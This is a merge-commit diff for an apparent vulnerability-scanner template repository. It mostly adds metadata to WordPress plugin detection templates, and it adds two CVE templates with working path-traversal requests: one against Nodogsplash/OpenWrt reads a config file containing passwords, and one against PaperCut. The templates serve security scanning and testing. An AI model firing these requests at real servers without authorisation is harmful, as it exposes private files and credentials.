Merge branch 'projectdiscovery:main' into main

patch-1
Mehran Seifalinia 2023-08-07 15:25:10 +03:30 committed by GitHub
commit f63538897c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
210 changed files with 504 additions and 255 deletions

View File

@ -116,6 +116,8 @@ http/cves/2023/CVE-2023-1698.yaml
http/cves/2023/CVE-2023-32117.yaml
http/cves/2023/CVE-2023-35082.yaml
http/cves/2023/CVE-2023-37580.yaml
http/cves/2023/CVE-2023-39120.yaml
http/cves/2023/CVE-2023-39143.yaml
http/misconfiguration/mobsf-framework-exposure.yaml
http/misconfiguration/openstack-config.yaml
http/misconfiguration/oracle-reports-services.yaml

View File

@ -1962,3 +1962,5 @@
{"ID":"CVE-2023-38205","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38205.yaml"}
{"ID":"CVE-2023-3836","Info":{"Name":"Dahua Smart Park Management - Arbitrary File Upload","Severity":"high","Description":"Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-3836.yaml"}
{"ID":"CVE-2023-38646","Info":{"Name":"Metabase \u003c 0.46.6.1 - Remote Code Execution","Severity":"critical","Description":"Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-38646.yaml"}
{"ID":"CVE-2023-39120","Info":{"Name":"Nodogsplash - Directory Traversal","Severity":"high","Description":"Nodogsplash product was affected by a directory traversal vulnerability that also impacted the OpenWrt product. This vulnerability was addressed in Nodogsplash version 5.0.1. Exploiting this vulnerability, remote attackers could read arbitrary files from the target system.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-39120.yaml"}
{"ID":"CVE-2023-39143","Info":{"Name":"PaperCut \u003c 22.1.3 - Path Traversal","Severity":"critical","Description":"PaperCut NG and PaperCut MF before 22.1.3 are vulnerable to path traversal which enables attackers to read, delete, and upload arbitrary files.","Classification":{"CVSSScore":"9.4"}},"file_path":"http/cves/2023/CVE-2023-39143.yaml"}

View File

@ -1 +1 @@
313150729186c4293a658fb2199a5a78
d761e0d82d6f6e706800785c002bd58a

View File

@ -1 +1 @@
5.7.7
5.8

View File

@ -1 +1 @@
1.6.0
1.7.0

View File

@ -1 +1 @@
0.9.88
0.9.89

View File

@ -5,50 +5,10 @@ info:
author: rootxharsh,iamnoooob,pdresearch
severity: high
description: Sonatype Nexus Repository before 3.21.2 allows JavaEL Injection
reference:
- "-"
- " "
- h
- t
- p
- s
- ":"
- /
- w
- i
- e
- r
- .
- c
- o
- m
- a
- n
- b
- u
- "1"
- "2"
- "4"
- "6"
- "8"
- "7"
- "3"
- "0"
- "9"
- "\n"
- y
- l
- g
- d
- v
- G
- H
- S
- L
- x
- C
- V
- E
reference: |
- https://twitter.com/iamnoooob/status/1246182773427240967
- https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype
- https://nvd.nist.gov/vuln/detail/CVE-2020-10199
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8

View File

@ -0,0 +1,47 @@
id: CVE-2023-39120
info:
name: Nodogsplash - Directory Traversal
author: Numan Türle
severity: high
description: |
Nodogsplash product was affected by a directory traversal vulnerability that also impacted the OpenWrt product. This vulnerability was addressed in Nodogsplash version 5.0.1. Exploiting this vulnerability, remote attackers could read arbitrary files from the target system.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-39120
- https://github.com/nodogsplash/nodogsplash/commit/a745a5d635925d2a6f0e0530bdc0eac645b672ed
- https://gist.github.com/numanturle/55cb758bacc4930a081e79c2a6a769b6
- https://github.com/openwrt/routing/pull/997
remediation: Apply all relevant security patches and product upgrades.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-39120
cwe-id: CWE-22
metadata:
verified: true
max-request: 1
shodan-query: title:"OpenWRT"
tags: cve,cve2023,lfi,openwrt,nodogsplash
http:
- method: GET
path:
- "{{BaseURL}}/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/config/nodogsplash"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "nodogsplash"
- "password"
condition: and
- type: word
part: header
words:
- "application/octet-stream"
- type: status
status:
- 200

View File

@ -0,0 +1,36 @@
id: CVE-2023-39143
info:
name: PaperCut < 22.1.3 - Path Traversal
author: pdteam
severity: critical
description: PaperCut NG and PaperCut MF before 22.1.3 are vulnerable to path traversal which enables attackers to read, delete, and upload arbitrary files.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-39143
- https://www.horizon3.ai/cve-2023-39143-papercut-path-traversal-file-upload-rce-vulnerability/
- https://www.papercut.com/kb/Main/securitybulletinjuly2023/
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-131a
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H
cve-id: CVE-2023-39143
cvss-score: 9.4
epss-score: 0.00043
metadata:
max-request: 1
verified: true
shodan-query: html:"content="PaperCut""
tags: cve,cve2023,lfi,papercut,kev
http:
- method: GET
path:
- "{{BaseURL}}/custom-report-example/..\\..\\..\\deployment\\sharp\\icons\\home-app.png"
matchers:
- type: dsl
dsl:
- content_length == 1655
- status_code == 200
- contains(to_lower(content_type), "image/png")
- contains(hex_encode(body), "89504e470d0a1a0a") # PNG file signature in hex
condition: and

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/ad-inserter/
metadata:
max-request: 1
plugin_namespace: ad-inserter
wpscan: https://wpscan.com/plugin/ad-inserter
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/add-to-any/
metadata:
max-request: 1
plugin_namespace: add-to-any
wpscan: https://wpscan.com/plugin/add-to-any
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/admin-menu-editor/
metadata:
max-request: 1
plugin_namespace: admin-menu-editor
wpscan: https://wpscan.com/plugin/admin-menu-editor
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/advanced-custom-fields/
metadata:
max-request: 1
plugin_namespace: advanced-custom-fields
wpscan: https://wpscan.com/plugin/advanced-custom-fields
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/akismet/
metadata:
max-request: 1
plugin_namespace: akismet
wpscan: https://wpscan.com/plugin/akismet
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/all-404-redirect-to-homepage/
metadata:
max-request: 1
plugin_namespace: all-404-redirect-to-homepage
wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/all-in-one-seo-pack/
metadata:
max-request: 1
plugin_namespace: all-in-one-seo-pack
wpscan: https://wpscan.com/plugin/all-in-one-seo-pack
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/all-in-one-wp-migration/
metadata:
max-request: 1
plugin_namespace: all-in-one-wp-migration
wpscan: https://wpscan.com/plugin/all-in-one-wp-migration
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/
metadata:
max-request: 1
plugin_namespace: all-in-one-wp-security-and-firewall
wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/amp/
metadata:
max-request: 1
plugin_namespace: amp
wpscan: https://wpscan.com/plugin/amp
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/antispam-bee/
metadata:
max-request: 1
plugin_namespace: antispam-bee
wpscan: https://wpscan.com/plugin/antispam-bee
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/astra-sites/
metadata:
max-request: 1
plugin_namespace: astra-sites
wpscan: https://wpscan.com/plugin/astra-sites
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/astra-widgets/
metadata:
max-request: 1
plugin_namespace: astra-widgets
wpscan: https://wpscan.com/plugin/astra-widgets
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/autoptimize/
metadata:
max-request: 1
plugin_namespace: autoptimize
wpscan: https://wpscan.com/plugin/autoptimize
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/backwpup/
metadata:
max-request: 1
plugin_namespace: backwpup
wpscan: https://wpscan.com/plugin/backwpup
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/better-search-replace/
metadata:
max-request: 1
plugin_namespace: better-search-replace
wpscan: https://wpscan.com/plugin/better-search-replace
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/better-wp-security/
metadata:
max-request: 1
plugin_namespace: better-wp-security
wpscan: https://wpscan.com/plugin/better-wp-security
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/black-studio-tinymce-widget/
metadata:
max-request: 1
plugin_namespace: black-studio-tinymce-widget
wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/breadcrumb-navxt/
metadata:
max-request: 1
plugin_namespace: breadcrumb-navxt
wpscan: https://wpscan.com/plugin/breadcrumb-navxt
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/breeze/
metadata:
max-request: 1
plugin_namespace: breeze
wpscan: https://wpscan.com/plugin/breeze
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/broken-link-checker/
metadata:
max-request: 1
plugin_namespace: broken-link-checker
wpscan: https://wpscan.com/plugin/broken-link-checker
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/child-theme-configurator/
metadata:
max-request: 1
plugin_namespace: child-theme-configurator
wpscan: https://wpscan.com/plugin/child-theme-configurator
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/classic-editor/
metadata:
max-request: 1
plugin_namespace: classic-editor
wpscan: https://wpscan.com/plugin/classic-editor
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/classic-widgets/
metadata:
max-request: 1
plugin_namespace: classic-widgets
wpscan: https://wpscan.com/plugin/classic-widgets
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/click-to-chat-for-whatsapp/
metadata:
max-request: 1
plugin_namespace: click-to-chat-for-whatsapp
wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/cmb2/
metadata:
max-request: 1
plugin_namespace: cmb2
wpscan: https://wpscan.com/plugin/cmb2
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/coblocks/
metadata:
max-request: 1
plugin_namespace: coblocks
wpscan: https://wpscan.com/plugin/coblocks
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/code-snippets/
metadata:
max-request: 1
plugin_namespace: code-snippets
wpscan: https://wpscan.com/plugin/code-snippets
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/coming-soon/
metadata:
max-request: 1
plugin_namespace: coming-soon
wpscan: https://wpscan.com/plugin/coming-soon
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/complianz-gdpr/
metadata:
max-request: 1
plugin_namespace: complianz-gdpr
wpscan: https://wpscan.com/plugin/complianz-gdpr
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/contact-form-7-honeypot/
metadata:
max-request: 1
plugin_namespace: contact-form-7-honeypot
wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/contact-form-7/
metadata:
max-request: 1
plugin_namespace: contact-form-7
wpscan: https://wpscan.com/plugin/contact-form-7
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/contact-form-cfdb7/
metadata:
max-request: 1
plugin_namespace: contact-form-cfdb7
wpscan: https://wpscan.com/plugin/contact-form-cfdb7
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/cookie-law-info/
metadata:
max-request: 1
plugin_namespace: cookie-law-info
wpscan: https://wpscan.com/plugin/cookie-law-info
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/cookie-notice/
metadata:
max-request: 1
plugin_namespace: cookie-notice
wpscan: https://wpscan.com/plugin/cookie-notice
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/creame-whatsapp-me/
metadata:
max-request: 1
plugin_namespace: creame-whatsapp-me
wpscan: https://wpscan.com/plugin/creame-whatsapp-me
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/creative-mail-by-constant-contact/
metadata:
max-request: 1
plugin_namespace: creative-mail-by-constant-contact
wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/custom-css-js/
metadata:
max-request: 1
plugin_namespace: custom-css-js
wpscan: https://wpscan.com/plugin/custom-css-js
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/custom-fonts/
metadata:
max-request: 1
plugin_namespace: custom-fonts
wpscan: https://wpscan.com/plugin/custom-fonts
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/custom-post-type-ui/
metadata:
max-request: 1
plugin_namespace: custom-post-type-ui
wpscan: https://wpscan.com/plugin/custom-post-type-ui
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/disable-comments/
metadata:
max-request: 1
plugin_namespace: disable-comments
wpscan: https://wpscan.com/plugin/disable-comments
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/disable-gutenberg/
metadata:
max-request: 1
plugin_namespace: disable-gutenberg
wpscan: https://wpscan.com/plugin/disable-gutenberg
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/duplicate-page/
metadata:
max-request: 1
plugin_namespace: duplicate-page
wpscan: https://wpscan.com/plugin/duplicate-page
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/duplicate-post/
metadata:
max-request: 1
plugin_namespace: duplicate-post
wpscan: https://wpscan.com/plugin/duplicate-post
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/duplicator/
metadata:
max-request: 1
plugin_namespace: duplicator
wpscan: https://wpscan.com/plugin/duplicator
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/duracelltomi-google-tag-manager/
metadata:
max-request: 1
plugin_namespace: duracelltomi-google-tag-manager
wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/easy-fancybox/
metadata:
max-request: 1
plugin_namespace: easy-fancybox
wpscan: https://wpscan.com/plugin/easy-fancybox
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/easy-table-of-contents/
metadata:
max-request: 1
plugin_namespace: easy-table-of-contents
wpscan: https://wpscan.com/plugin/easy-table-of-contents
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/easy-wp-smtp/
metadata:
max-request: 1
plugin_namespace: easy-wp-smtp
wpscan: https://wpscan.com/plugin/easy-wp-smtp
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/elementor/
metadata:
max-request: 1
plugin_namespace: elementor
wpscan: https://wpscan.com/plugin/elementor
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/elementskit-lite/
metadata:
max-request: 1
plugin_namespace: elementskit-lite
wpscan: https://wpscan.com/plugin/elementskit-lite
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/enable-media-replace/
metadata:
max-request: 1
plugin_namespace: enable-media-replace
wpscan: https://wpscan.com/plugin/enable-media-replace
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/envato-elements/
metadata:
max-request: 1
plugin_namespace: envato-elements
wpscan: https://wpscan.com/plugin/envato-elements
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/essential-addons-for-elementor-lite/
metadata:
max-request: 1
plugin_namespace: essential-addons-for-elementor-lite
wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/ewww-image-optimizer/
metadata:
max-request: 1
plugin_namespace: ewww-image-optimizer
wpscan: https://wpscan.com/plugin/ewww-image-optimizer
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/facebook-for-woocommerce/
metadata:
max-request: 1
plugin_namespace: facebook-for-woocommerce
wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/fast-indexing-api/
metadata:
max-request: 1
plugin_namespace: fast-indexing-api
wpscan: https://wpscan.com/plugin/fast-indexing-api
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/favicon-by-realfavicongenerator/
metadata:
max-request: 1
plugin_namespace: favicon-by-realfavicongenerator
wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/flamingo/
metadata:
max-request: 1
plugin_namespace: flamingo
wpscan: https://wpscan.com/plugin/flamingo
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/fluentform/
metadata:
max-request: 1
plugin_namespace: fluentform
wpscan: https://wpscan.com/plugin/fluentform
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/font-awesome/
metadata:
max-request: 1
plugin_namespace: font-awesome
wpscan: https://wpscan.com/plugin/font-awesome
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/force-regenerate-thumbnails/
metadata:
max-request: 1
plugin_namespace: force-regenerate-thumbnails
wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/formidable/
metadata:
max-request: 1
plugin_namespace: formidable
wpscan: https://wpscan.com/plugin/formidable
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/forminator/
metadata:
max-request: 1
plugin_namespace: forminator
wpscan: https://wpscan.com/plugin/forminator
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/ga-google-analytics/
metadata:
max-request: 1
plugin_namespace: ga-google-analytics
wpscan: https://wpscan.com/plugin/ga-google-analytics
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/gdpr-cookie-compliance/
metadata:
max-request: 1
plugin_namespace: gdpr-cookie-compliance
wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
metadata:
max-request: 1
plugin_namespace: google-analytics-dashboard-for-wp
wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/google-analytics-for-wordpress/
metadata:
max-request: 1
plugin_namespace: google-analytics-for-wordpress
wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/google-listings-and-ads/
metadata:
max-request: 1
plugin_namespace: google-listings-and-ads
wpscan: https://wpscan.com/plugin/google-listings-and-ads
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/google-site-kit/
metadata:
max-request: 1
plugin_namespace: google-site-kit
wpscan: https://wpscan.com/plugin/google-site-kit
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/google-sitemap-generator/
metadata:
max-request: 1
plugin_namespace: google-sitemap-generator
wpscan: https://wpscan.com/plugin/google-sitemap-generator
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/gtranslate/
metadata:
max-request: 1
plugin_namespace: gtranslate
wpscan: https://wpscan.com/plugin/gtranslate
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/gutenberg/
metadata:
max-request: 1
plugin_namespace: gutenberg
wpscan: https://wpscan.com/plugin/gutenberg
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/happy-elementor-addons/
metadata:
max-request: 1
plugin_namespace: happy-elementor-addons
wpscan: https://wpscan.com/plugin/happy-elementor-addons
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/header-and-footer-scripts/
metadata:
max-request: 1
plugin_namespace: header-and-footer-scripts
wpscan: https://wpscan.com/plugin/header-and-footer-scripts
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/header-footer-code-manager/
metadata:
max-request: 1
plugin_namespace: header-footer-code-manager
wpscan: https://wpscan.com/plugin/header-footer-code-manager
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/header-footer-elementor/
metadata:
max-request: 1
plugin_namespace: header-footer-elementor
wpscan: https://wpscan.com/plugin/header-footer-elementor
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/header-footer/
metadata:
max-request: 1
plugin_namespace: header-footer
wpscan: https://wpscan.com/plugin/header-footer
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/health-check/
metadata:
max-request: 1
plugin_namespace: health-check
wpscan: https://wpscan.com/plugin/health-check
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/hello-dolly/
metadata:
max-request: 1
plugin_namespace: hello-dolly
wpscan: https://wpscan.com/plugin/hello-dolly
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/host-webfonts-local/
metadata:
max-request: 1
plugin_namespace: host-webfonts-local
wpscan: https://wpscan.com/plugin/host-webfonts-local
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/imagify/
metadata:
max-request: 1
plugin_namespace: imagify
wpscan: https://wpscan.com/plugin/imagify
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/imsanity/
metadata:
max-request: 1
plugin_namespace: imsanity
wpscan: https://wpscan.com/plugin/imsanity
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/insert-headers-and-footers/
metadata:
max-request: 1
plugin_namespace: insert-headers-and-footers
wpscan: https://wpscan.com/plugin/insert-headers-and-footers
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/instagram-feed/
metadata:
max-request: 1
plugin_namespace: instagram-feed
wpscan: https://wpscan.com/plugin/instagram-feed
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/intuitive-custom-post-order/
metadata:
max-request: 1
plugin_namespace: intuitive-custom-post-order
wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/iwp-client/
metadata:
max-request: 1
plugin_namespace: iwp-client
wpscan: https://wpscan.com/plugin/iwp-client
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/jetpack-boost/
metadata:
max-request: 1
plugin_namespace: jetpack-boost
wpscan: https://wpscan.com/plugin/jetpack-boost
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/jetpack/
metadata:
max-request: 1
plugin_namespace: jetpack
wpscan: https://wpscan.com/plugin/jetpack
tags: tech,wordpress,wp-plugin,top-100,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/kadence-blocks/
metadata:
max-request: 1
plugin_namespace: kadence-blocks
wpscan: https://wpscan.com/plugin/kadence-blocks
tags: tech,wordpress,wp-plugin,top-200

View File

@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/kirki/
metadata:
max-request: 1
plugin_namespace: kirki
wpscan: https://wpscan.com/plugin/kirki
tags: tech,wordpress,wp-plugin,top-200

Some files were not shown because too many files have changed in this diff Show More